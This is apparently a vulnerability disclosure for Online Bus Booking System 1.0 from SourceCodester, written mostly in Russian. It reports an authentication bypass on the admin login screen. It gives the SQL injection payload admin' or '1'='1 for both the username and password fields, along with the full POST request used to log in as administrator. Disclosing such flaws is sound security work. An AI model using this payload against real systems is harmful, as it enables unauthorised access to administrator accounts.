
Онлайн-система бронирования автобусов 1.0, существует обход аутентификации на экране входа администратора в admin.php через SQL-инъекцию в имени пользователя или пароле.
Online Bus Booking System 1.0, присутствует обход аутентификации на экране входа администратора в admin.php через SQL-инъекцию в имени пользователя или пароле.
#Поставщик - SourceCodester
#Продукт - https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Тип уязвимости - Обход аутентификации
#Затронутый компонент - bus_booking/admin.php
#Тип атаки - Локальная
#Повышение привилегий - true
#Воздействие: выполнение кода - true
Вектор атаки
Перейдите на панель входа администратора и попробуйте обойти
В payload запроса укажите
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Успешный вход в панель администратора